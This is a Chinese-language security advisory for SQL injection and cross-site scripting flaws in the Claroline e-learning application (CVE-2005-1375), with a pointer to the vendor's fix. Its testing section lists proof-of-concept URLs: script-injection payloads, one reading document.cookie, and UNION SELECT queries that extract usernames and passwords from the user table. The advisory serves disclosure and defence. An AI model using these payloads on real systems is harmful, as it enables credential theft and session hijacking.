Claroline E-Learning应用多个远程输入验证漏洞
发布日期:2005-05-02
更新日期:2005-05-02
受影响系统:Claroline Claroline 1.5.3 - 1.6
描述:
BUGTRAQ ID:
13407
CVE(CAN) ID:
CVE-2005-1375
Claroline E-Learning Application是一种基于Web网络教学系统。
Claroline在处理用户请求时存在多个输入验证漏洞,远程攻击者可能利用这些漏洞非授权操作数据库,在用户浏览器中执行恶意代码,造成信息泄露或数据破坏。
Claroline的多个脚本没有充分检查过滤用户的参数数据,远程攻击者可以利用来执行SQL注入、跨站脚本执行等攻击。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http:///www.example.com/claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http:///www.example.com/claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
http:///www.example.com/claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
建议:
厂商补丁:
Claroline
---------
目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
http://www.claroline.net/浏览次数:2671
严重程度:0(网友投票)